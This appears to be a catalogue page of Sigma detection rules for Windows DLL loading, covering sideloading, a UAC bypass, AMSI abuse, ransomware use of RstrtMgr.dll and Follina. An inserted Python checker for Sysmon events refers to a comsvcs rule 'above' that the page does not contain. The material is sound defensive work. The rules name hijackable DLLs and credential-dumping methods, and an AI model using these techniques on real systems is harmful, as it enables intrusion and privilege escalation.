tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Iscsicpl - ImageLoad

Detects the "iscsicpl.exe" UAC bypass technique, which leverages DLL search order hijacking to load a custom DLL from a temp directory or any other user-controlled location in the user's %PATH%

Internal MISP references

UUID 9ed5959a-c43c-4c59-84e3-d28628429456 which can be used as unique global reference for UAC Bypass Using Iscsicpl - ImageLoad in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/17
falsepositive ['Unknown']
filename image_load_uac_bypass_iscsicpl.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Wazuh Security Platform DLL Sideloading

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

Internal MISP references

UUID db77ce78-7e28-4188-9337-cf30e2b3ba9f which can be used as unique global reference for Potential Wazuh Security Platform DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/13
falsepositive ['Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)']
filename image_load_side_load_wazuh.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Vivaldi_elf.DLL Sideloading

Detects potential DLL sideloading of "vivaldi_elf.dll"

Internal MISP references

UUID 2092cacb-d77b-4f98-ab0d-32b32f99a054 which can be used as unique global reference for Potential Vivaldi_elf.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unknown']
filename image_load_side_load_vivaldi_elf.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Rcdll.DLL Sideloading

Detects potential DLL sideloading of rcdll.dll

Internal MISP references

UUID 6e78b74f-c762-4800-82ad-f66787f10c8a which can be used as unique global reference for Potential Rcdll.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/13
falsepositive ['Unknown']
filename image_load_side_load_rcdll.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

HackTool - SharpEvtMute DLL Load

Detects the load of EvtMuteHook.dll, a key component of SharpEvtMute, a tool that tampers with the Windows event logs

Internal MISP references

UUID 49329257-089d-46e6-af37-4afce4290685 which can be used as unique global reference for HackTool - SharpEvtMute DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Other DLLs with the same Imphash']
filename image_load_hktl_sharpevtmute.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Fax Service DLL Search Order Hijack

The Fax service attempts to load ualapi.dll, which does not exist on a default installation. An attacker can plant their own malicious DLL under that name and have the service (side)load it.

Internal MISP references

UUID 828af599-4c53-4ed2-ba4a-a9f835c434ea which can be used as unique global reference for Fax Service DLL Search Order Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/04
falsepositive ['Unlikely']
filename image_load_side_load_ualapi.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential SolidPDFCreator.DLL Sideloading

Detects potential DLL sideloading of "SolidPDFCreator.dll"

Internal MISP references

UUID a2edbce1-95c8-4291-8676-0d45146862b3 which can be used as unique global reference for Potential SolidPDFCreator.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/05/07
falsepositive ['Unknown']
filename image_load_side_load_solidpdfcreator.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Unsigned DLL Loaded by Windows Utility

Detects Windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse these programs to proxy execution of malicious code.

Internal MISP references

UUID b5de0c9a-6f19-43e0-af4e-55ad01f550af which can be used as unique global reference for Unsigned DLL Loaded by Windows Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/28
falsepositive ['Unknown']
filename image_load_susp_unsigned_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.t1218.011', 'attack.t1218.010', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.
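The two entries above, "Suspicious Renamed Comsvcs DLL Loaded By Rundll32" and "Unsigned DLL Loaded by Windows Utility", describe checks on the same Sysmon image-load event (Event ID 7). The following is an added example written for this page, not the Sigma rules' own detection logic: it evaluates both checks over constructed records whose field names follow Sysmon Event ID 7 (Image, ImageLoaded, OriginalFileName, Signed, SignatureStatus). The utility list and the sample records are assumptions made for the example.

```python
"""Added example (not the Sigma rules' own logic): two image-load checks over
Sysmon Event ID 7 records. Field names follow Sysmon; the utility list and the
sample records below are constructed for the example."""

from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Windows utilities commonly abused to proxy execution of a DLL
# (assumption: an example subset, not the rule's list).
PROXY_UTILITIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "odbcconf.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    image: str
    image_loaded: str


def _basename(path: str) -> str:
    """Case-folded file name of a Windows path (ntpath handles '\\' on any OS)."""
    return ntpath.basename(path).lower()


def check_renamed_comsvcs(ev: dict) -> Alert | None:
    """rundll32.exe loading a DLL whose PE version info still says comsvcs.dll
    while its on-disk name differs (the MiniDump export used for process dumps).
    Authenticode covers file contents, not the file name, so a renamed copy
    keeps a valid signature; OriginalFileName is the field that exposes it."""
    if _basename(ev.get("Image", "")) != "rundll32.exe":
        return None
    original = str(ev.get("OriginalFileName", "")).lower()
    if original == "comsvcs.dll" and _basename(ev.get("ImageLoaded", "")) != "comsvcs.dll":
        return Alert("renamed_comsvcs_by_rundll32", ev["Image"], ev["ImageLoaded"])
    return None


def check_unsigned_dll_by_utility(ev: dict) -> Alert | None:
    """A proxy-execution utility loading a DLL that is unsigned or whose
    signature did not validate (Sysmon reports Signed=true/false and a
    SignatureStatus such as 'Valid' or 'Unavailable')."""
    if _basename(ev.get("Image", "")) not in PROXY_UTILITIES:
        return None
    signed = str(ev.get("Signed", "false")).lower() == "true"
    status = str(ev.get("SignatureStatus", "")).lower()
    if not signed or status != "valid":
        return Alert("unsigned_dll_by_windows_utility", ev["Image"], ev["ImageLoaded"])
    return None


CHECKS = (check_renamed_comsvcs, check_unsigned_dll_by_utility)


def evaluate(events: list[dict]) -> list[Alert]:
    """Run every check over every event; one event may raise several alerts."""
    alerts: list[Alert] = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit is not None:
                alerts.append(hit)
    return alerts


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # Genuine comsvcs.dll from System32: neither check fires.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Windows\System32\comsvcs.dll",
     "OriginalFileName": "comsvcs.dll", "Signed": "true", "SignatureStatus": "Valid"},
    # Renamed but still Microsoft-signed copy: only the OriginalFileName check catches it.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Users\Public\svc.dll",
     "OriginalFileName": "comsvcs.dll", "Signed": "true", "SignatureStatus": "Valid"},
    # Unsigned DLL registered through regsvr32.exe from a user-writable path.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\payload.dll",
     "OriginalFileName": "payload.dll", "Signed": "false", "SignatureStatus": "Unavailable"},
    # Unsigned DLL loaded by a non-utility process: out of scope for both checks.
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\plugin.dll",
     "OriginalFileName": "plugin.dll", "Signed": "false", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"{alert.rule}: {alert.image} -> {alert.image_loaded}")
```

The second sample record is the point of the pairing: a renamed comsvcs.dll copied out of System32 still carries a valid Microsoft signature, so a signature-only rule never sees it, while the OriginalFileName field does.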

WMI Persistence - Command Line Event Consumer

Detects WMI command line event consumers

Internal MISP references

UUID 05936ce2-ee05-4dae-9d03-9a391cf2d2c6 which can be used as unique global reference for WMI Persistence - Command Line Event Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Unknown (data set is too small; further testing needed)']
filename image_load_wmi_persistence_commandline_event_consumer.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.t1546.003', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Unsigned Mfdetours.DLL Sideloading

Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

Internal MISP references

UUID 948a0953-f287-4806-bbcb-3b2e396df89f which can be used as unique global reference for Unsigned Mfdetours.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/11
falsepositive ['Unlikely']
filename image_load_side_load_mfdetours_unsigned.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

VMGuestLib DLL Sideload

Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.

Internal MISP references

UUID 70e8e9b4-6a93-4cb7-8cde-da69502e7aff which can be used as unique global reference for VMGuestLib DLL Sideload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/01
falsepositive ['FP could occur if the legitimate version of vmGuestLib already exists on the system']
filename image_load_side_load_vmguestlib.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of Non-Existent DLLs From System Folders

Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.

Internal MISP references

UUID 6b98b92b-4f00-4f62-b4fe-4d1920215771 which can be used as unique global reference for Potential DLL Sideloading Of Non-Existent DLLs From System Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), SBousseaden
creation_date 2022/12/09
falsepositive ['Unknown']
filename image_load_side_load_non_existent_dlls.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of DBGCORE.DLL

Detects DLL sideloading of "dbgcore.dll"

Internal MISP references

UUID 9ca2bf31-0570-44d8-a543-534c47c33ed7 which can be used as unique global reference for Potential DLL Sideloading Of DBGCORE.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/10/25
falsepositive ['Legitimate applications loading their own versions of the DLL mentioned in this rule']
filename image_load_side_load_dbgcore_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Amsi.DLL Loaded Via LOLBIN Process

Detects loading of "Amsi.dll" by a living-off-the-land binary (LOLBIN). This could be an indication of a "PowerShell without PowerShell" attack

Internal MISP references

UUID 6ec86d9e-912e-4726-91a2-209359b999b9 which can be used as unique global reference for Amsi.DLL Loaded Via LOLBIN Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename image_load_dll_amsi_suspicious_process.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion']

Potential AVKkid.DLL Sideloading

Detects potential DLL sideloading of "AVKkid.dll"

Internal MISP references

UUID 952ed57c-8f99-453d-aee0-53a49c22f95d which can be used as unique global reference for Potential AVKkid.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unknown']
filename image_load_side_load_avkkid.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via JsSchHlp

Detects potential DLL sideloading via JsSchHlp, a component of the JUSTSYSTEMS Japanese word processor

Internal MISP references

UUID 68654bf0-4412-43d5-bfe8-5eaa393cd939 which can be used as unique global reference for Potential DLL Sideloading Via JsSchHlp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/14
falsepositive ['Unknown']
filename image_load_side_load_jsschhlp.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".

Internal MISP references

UUID d2451be2-b582-4e15-8701-4196ac180260 which can be used as unique global reference for Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/04/15
falsepositive ['Unknown']
filename image_load_side_load_keyscrambler.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

System Control Panel Item Loaded From Uncommon Location

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.

Internal MISP references

UUID 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde which can be used as unique global reference for System Control Panel Item Loaded From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anish Bogati
creation_date 2024/01/09
falsepositive ['Unknown']
filename image_load_side_load_cpl_from_non_system_location.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Using Coregen.exe

Detects usage of the "coregen.exe" binary (Microsoft CoreCLR Native Image Generator) to sideload arbitrary DLLs.

Internal MISP references

UUID 0fa66f66-e3f6-4a9c-93f8-4f2610b00171 which can be used as unique global reference for Potential DLL Sideloading Using Coregen.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/31
falsepositive ['Unknown']
filename image_load_side_load_coregen.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

Detects exploitation of CVE-2022-30190 (Follina) and of the DogWalk vulnerability, both of which abuse the msdt.exe binary to load the "sdiageng.dll" library

Internal MISP references

UUID ec8c4047-fad9-416a-8c81-0f479353d7f6 which can be used as unique global reference for Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Greg (rule)
creation_date 2022/06/17
falsepositive ['Unknown']
filename image_load_dll_sdiageng_load_by_msdt.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202', 'cve.2022.30190']
Related clusters

To see the related clusters, click here.

Remote DLL Load Via Rundll32.EXE

Detects a remote DLL load event via "rundll32.exe".

Internal MISP references

UUID f40017b3-cb2e-4335-ab5d-3babf679c1de which can be used as unique global reference for Remote DLL Load Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/18
falsepositive ['Unknown']
filename image_load_rundll32_remote_share_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

VMMap Signed Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.

Internal MISP references

UUID 98ffaed4-aec2-4e04-9b07-31492fe68b3d which can be used as unique global reference for VMMap Signed Dbghelp.DLL Potential Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Unknown']
filename image_load_side_load_vmmap_dbghelp_signed.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential System DLL Sideloading From Non System Locations

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

Internal MISP references

UUID 4fc0deee-0057-4998-ab31-d24e46e0aba4 which can be used as unique global reference for Potential System DLL Sideloading From Non System Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Legitimate applications loading their own versions of the DLLs mentioned in this rule']
filename image_load_side_load_from_non_system_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Abusable DLL Potential Sideloading From Suspicious Location

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

Internal MISP references

UUID 799a5f48-0ac1-4e0f-9152-71d137d48c2a which can be used as unique global reference for Abusable DLL Potential Sideloading From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/11
falsepositive ['Unknown']
filename image_load_side_load_abused_dlls_susp_paths.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Volume Shadow Copy VSS_PS.dll Load

Detects the image load of vss_ps.dll by uncommon executables

Internal MISP references

UUID 333cdbe8-27bb-4246-bf82-b41a0dca4b70 which can be used as unique global reference for Suspicious Volume Shadow Copy VSS_PS.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @markus_neis
creation_date 2021/07/07
falsepositive ['Unknown']
filename image_load_dll_vss_ps_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential CCleanerDU.DLL Sideloading

Detects potential DLL sideloading of "CCleanerDU.dll"

Internal MISP references

UUID 1fbc0671-5596-4e17-8682-f020a0b995dc which can be used as unique global reference for Potential CCleanerDU.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/13
falsepositive ['False positives could occur from other custom installation paths. Apply additional filters accordingly.']
filename image_load_side_load_ccleaner_du.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Azure Browser SSO Abuse

Detects abuse of Azure Browser SSO, in which OAuth 2.0 refresh tokens are requested for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and the user logged in with an Azure AD account) who would normally use them for SSO in the browser. An attacker can use such a token to authenticate to Azure AD in a browser as that user.

Internal MISP references

UUID 50f852e6-af22-4c78-9ede-42ef36aa3453 which can be used as unique global reference for Potential Azure Browser SSO Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Den Iuzvyk
creation_date 2020/07/15
falsepositive ['False positives are expected since this rule is only looking for the DLL load event. This rule is better used in correlation with related activity']
filename image_load_dll_azure_microsoft_account_token_provider_dll_load.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Aruba Network Service Potential DLL Sideloading

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

Internal MISP references

UUID 90ae0469-0cee-4509-b67f-e5efcef040f7 which can be used as unique global reference for Aruba Network Service Potential DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Unknown']
filename image_load_side_load_aruba_networks_virtual_intranet_access.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential RjvPlatform.DLL Sideloading From Non-Default Location

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.

Internal MISP references

UUID 0e0bc253-07ed-43f1-816d-e1b220fe8971 which can be used as unique global reference for Potential RjvPlatform.DLL Sideloading From Non-Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unlikely']
filename image_load_side_load_rjvplatform_non_default_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

PowerShell Core DLL Loaded By Non PowerShell Process

Detects loading of the essential PowerShell DLLs by a non-PowerShell process. This is behavior similar to Meterpreter's "load powershell" extension.

Internal MISP references

UUID 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f which can be used as unique global reference for PowerShell Core DLL Loaded By Non PowerShell Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/11/14
falsepositive ['Used by some .NET binaries, minimal on user workstation.', 'Used by Microsoft SQL Server Management Studio']
filename image_load_dll_system_management_automation_susp_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.t1059.001', 'attack.execution']
Related clusters

To see the related clusters, click here.

Load Of RstrtMgr.DLL By An Uncommon Process

Detects the load of the Restart Manager DLL (RstrtMgr.dll) by an uncommon process. Ransomware families (e.g. Conti, Cactus) have used this library to terminate processes that hold locks on files and would otherwise block encryption; it was also recently seen in the BiBi wiper for Windows. It can likewise serve anti-analysis purposes by shutting down specific processes.

Internal MISP references

UUID 3669afd2-9891-4534-a626-e5cf03810a61 which can be used as unique global reference for Load Of RstrtMgr.DLL By An Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luc Génaux
creation_date 2023/11/28
falsepositive ['Other legitimate Windows processes not currently listed', 'Processes related to software installation']
filename image_load_dll_rstrtmgr_uncommon_load.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1486', 'attack.t1562.001']

Potential Antivirus Software DLL Sideloading

Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.

Internal MISP references

UUID 552b6b65-df37-4d3e-a258-f2fc4771ae54 which can be used as unique global reference for Potential Antivirus Software DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.', "Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.", "The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file"]
filename image_load_side_load_antivirus.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

DotNET Assembly DLL Loaded Via Office Application

Detects any assembly DLL being loaded by an Office Product

Internal MISP references

UUID ff0f2b05-09db-4095-b96d-1b75ca24894a which can be used as unique global reference for DotNET Assembly DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dotnet_assembly_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Third Party Software DLL Sideloading

Detects DLL sideloading of DLLs that are part of third-party software (Zoom, Discord, etc.)

Internal MISP references

UUID f9df325d-d7bc-4a32-8a1a-2cc61dcefc63 which can be used as unique global reference for Third Party Software DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unknown']
filename image_load_side_load_third_party.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Microsoft Excel Add-In Loaded From Uncommon Location

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

Internal MISP references

UUID af4c4609-5755-42fe-8075-4effb49f5d44 which can be used as unique global reference for Microsoft Excel Add-In Loaded From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/12
falsepositive ['Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations']
filename image_load_office_excel_xll_susp_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Load Of RstrtMgr.DLL By A Suspicious Process

Detects the load of the RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would otherwise block file encryption by holding files locked (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.

Internal MISP references

UUID b48492dc-c5ef-4572-8dff-32bc241c15c8 which can be used as unique global reference for Load Of RstrtMgr.DLL By A Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luc Génaux
creation_date 2023/11/28
falsepositive ['Processes related to software installation']
filename image_load_dll_rstrtmgr_suspicious_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1486', 'attack.t1562.001']

Potential DLL Sideloading Via VMware Xfer

Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL

Internal MISP references

UUID 9313dc13-d04c-46d8-af4a-a930cc55d93b which can be used as unique global reference for Potential DLL Sideloading Via VMware Xfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/02
falsepositive ['Unlikely']
filename image_load_side_load_vmware_xfer.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']

Potential Mfdetours.DLL Sideloading

Detects potential DLL sideloading of "mfdetours.dll". When "mftrace.exe" is used, it can be abused to attach to an arbitrary process and force-load any DLL named "mfdetours.dll" from the current working directory.

Internal MISP references

UUID d2605a99-2218-4894-8fd3-2afb7946514d which can be used as unique global reference for Potential Mfdetours.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unlikely']
filename image_load_side_load_mfdetours.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Python Image Load By Non-Python Process

Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.

Internal MISP references

UUID cbb56d62-4060-40f7-9466-d8aaf3123f83 which can be used as unique global reference for Python Image Load By Non-Python Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Patrick St. John, OTR (Open Threat Research)
creation_date 2020/05/03
falsepositive ['Legitimate Py2Exe Binaries', 'Known false positive caused with Python Anaconda']
filename image_load_susp_python_image_load.yml
level medium
logsource.category image_load
logsource.product windows
